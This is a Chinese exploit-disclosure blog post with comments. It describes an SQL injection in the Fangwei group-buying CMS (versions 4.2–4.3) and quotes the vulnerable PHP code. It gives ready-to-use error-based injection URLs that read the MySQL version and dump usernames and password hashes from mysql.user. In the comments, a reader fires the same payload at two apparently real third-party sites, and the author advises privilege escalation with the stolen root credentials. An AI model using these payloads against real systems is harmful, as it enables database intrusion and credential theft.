方维团购4.3最新版sql注入通杀4.2

\\app\source\goods_list.php [php] //团购分类 $sidegoodscatelist = getGoodsCate(" and pid=0 "); $catepid = 0;//分类ID $pid = 0;//顶级分类ID $sub_cate_list = array();//次级分类 $is_top_cate = 0;//是否是顶级分类 if($_REQUEST['m'] =="Goods" && $_REQUEST['a'] == "showcate" && $_REQUEST['id']!="") { $catepid = $_REQUEST['id']; //用来获取接收的参数id foreach($sidegoodscatelist as $k => $v){ if($v['id']==$catepid) { $is_top_cate=1; } } if($is_top_cate==0) { $sub_cate_list = getGoodsCate(" and pid=".$GLOBALS['db']->getOne("select pid from " . DB_PREFIX . "goods_cate where id=".$catepid)); //执行了select pid from " . DB_PREFIX . "goods_cate where id=."$_REQUEST['id']" //导致了注入的发生 foreach($sub_cate_list as $kk => $vv) { if($vv['id']==$catepid) { $pid = $vv['pid']; } } } else { $sub_cate_list = getGoodsCate(" and pid=".$catepid); $pid = $_REQUEST['id']; } } $GLOBALS['tpl']->assign('sidegoodscatelist',$sidegoodscatelist); //var_dump($sidegoodscatelist);exit; $GLOBALS['tpl']->assign('catepid',$catepid); $GLOBALS['tpl']->assign('sub_cate_list',$sub_cate_list); $GLOBALS['tpl']->assign('is_top_cate',$is_top_cate); $GLOBALS['tpl']->assign('pid',$pid); //end团购分类 [/php] 可以看到 [php]if($_REQUEST['m'] =="Goods" && $_REQUEST['a'] == "showcate" && $_REQUEST['id']!="")[/php] 假如m=goods,a=showcate并且传递的id值不为空 [php]$catepid = $_REQUEST['id'];[/php] //用来获取接收的参数id 再带入sql语句 [php]select pid from " . DB_PREFIX . "goods_cate where id=".$catepid[/php] 导致了注入的发生 1 exp: 1.判断mysql版本 [php]http://0day5.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)[/php] 3 2.获取mysql账号密码 [php]http://0day5.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(0x3a,host,0x3a,user,0x3a,password)%20FROM%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)[/php] 2

16 条评论

  1. 爆笑笑话

    感谢 辛苦整理这么多资料 简洁全面

    1. 0day5
      @爆笑笑话

      感谢你的支持~

  2. Ray

    应该是某37哪里的吧

  3. 小菜鸟

    老大能否写一个弄帐号密码的exp 你的我不会改

    1. 0day5
      @小菜鸟

      动下脑子有助于学习

  4. shy

    难道不能爆后台密码?哪有这么多root

    1. 0day5
      @shy

      能啊,这里只是举例子

  5. adsf

    话说爆出来的MYSQL密码怎么是41位的

    1. 0day5
      @adsf

      你仔细看图,有一个数字是多余的

    2. 0day5
      @adsf

      。。。。。。。。。。

  6. 神速小白

    http://tg.np5.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(0x3a,host,0x3a,user,0x3a,password)%20FROM%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

    1. 0day5
      @神速小白

      这个...只是提供那啥,别做非法用途

  7. 神速小白

    http://qianrengou.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(0x3a,host,0x3a,user,0x3a,password)%20FROM%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

    1. 0day5
      @神速小白

      这个...只是提供那啥,别做非法用途

      1. asdfg
        @0day5

        :razz:爆出来的root 怎么用

        1. 0day5
          @asdfg

          如果可以外连,或者是有phpmyadmin的可以尝试提权

发表评论